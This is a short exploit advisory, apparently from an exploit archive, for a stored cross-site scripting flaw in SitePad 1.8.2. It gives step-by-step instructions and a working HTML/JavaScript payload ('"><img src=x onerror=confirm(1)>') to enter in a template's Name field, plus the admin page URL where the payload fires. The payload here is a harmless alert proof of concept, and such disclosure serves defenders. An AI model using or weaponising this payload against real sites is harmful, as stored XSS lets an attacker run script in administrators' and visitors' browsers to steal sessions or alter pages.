Headline
SitePad 1.8.2 Cross Site Scripting
SitePad version 1.8.2 suffers from a persistent cross site scripting vulnerability.
Change Mirror Download
# Exploit Title: SitePad Version : 1.8.2 - Stored XSS # Date: 2024-21-02# Exploit Author: tmrswrr# Vendor Homepage: https://sitepad.com/# Version : 1.8.2# Tested on: https://www.softaculous.com/apps/blogs/SitePad1 ) Go to Templates > Header > Edit Pagelayer Template2 ) Write in Name : "><img src=x onerrora=confirm() onerror=confirm(1)>3) After save and refresh page will be see alert button https://127.0.0.1/SitePad/site-admin/admin.php?page=pagelayer_template_wizard&post=9